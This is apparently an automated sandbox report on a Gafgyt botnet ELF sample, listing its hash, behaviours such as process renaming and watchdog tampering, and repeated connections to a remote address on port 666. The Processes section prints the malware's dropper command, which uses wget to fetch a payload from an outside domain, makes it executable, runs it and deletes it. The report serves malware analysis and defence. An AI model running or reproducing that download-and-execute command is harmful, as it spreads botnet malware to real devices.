Malware Analysis Report

2025-08-05 23:59

Sample ID 240402-bpflaada35
Target a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf
SHA256 a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a
Tags
gafgyt
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a

Threat Level: Known bad

The file a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf was found to be: Known bad.

Malicious Activity Summary

gafgyt

Detected Gafgyt variant

Gafgyt family

Changes its process name

Executes dropped EXE

Modifies Watchdog functionality

Reads system routing table

Reads system network configuration

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-02 01:18

Signatures

Detected Gafgyt variant

Description Indicator Process Target
N/A N/A N/A N/A

Gafgyt family

gafgyt

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-02 01:18

Reported

2024-04-02 01:21

Platform

debian9-armhf-20240226-en

Max time kernel

147s

Max time network

138s

Command Line

[/tmp/a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf]

Signatures

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself sshd /tmp/a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/..... /tmp/..... N/A

Modifies Watchdog functionality

Description Indicator Process Target
File opened for modification /dev/misc/watchdog N/A N/A
File opened for modification /dev/watchdog N/A N/A

Reads system routing table

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf N/A

Reads system network configuration

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/..... /usr/bin/wget N/A

Processes

/tmp/a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf

[/tmp/a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf]

/bin/sh

[/bin/sh -c wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf .....]

/usr/bin/wget

[wget -q http://gay.energy/.../vivid -O .....]

/bin/chmod

[chmod 777 .....]

/tmp/.....

[./.....]

/bin/sh

[/bin/sh ./.....]

/bin/rm

[rm -rf .....]

Network

Country Destination Domain Proto
MD 85.239.33.129:666 tcp
US 1.1.1.1:53 gay.energy udp
US 1.1.1.1:53 gay.energy udp
MD 85.239.33.129:666 tcp
MD 85.239.33.129:666 tcp
MD 85.239.33.129:666 tcp
MD 85.239.33.129:666 tcp
MD 85.239.33.129:666 tcp
MD 85.239.33.129:666 tcp
MD 85.239.33.129:666 tcp
MD 85.239.33.129:666 tcp
MD 85.239.33.129:666 tcp

Files

N/A